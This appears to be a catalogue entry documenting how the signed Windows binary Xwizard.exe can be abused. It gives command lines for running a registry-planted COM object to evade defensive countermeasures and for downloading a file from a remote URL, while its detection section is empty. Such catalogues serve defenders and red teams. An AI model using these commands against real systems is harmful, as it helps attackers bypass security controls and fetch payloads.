Xwizard.exe

Execute custom class that has been added to the registry or download a file with Xwizard.exe

Paths

  • C:\Windows\System32\xwizard.exe
  • C:\Windows\SysWOW64\xwizard.exe

Commands

Execute

Xwizard.exe running a custom class that has been added to the registry.

Use case: Run a com object created in registry to evade defensive counter measures

Privileges: User

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}

Execute

Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.

Use case: Run a com object created in registry to evade defensive counter measures

Privileges: User

xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

Download

Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.

Use case: Download file from Internet

Privileges: User

xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}

Detection

Resources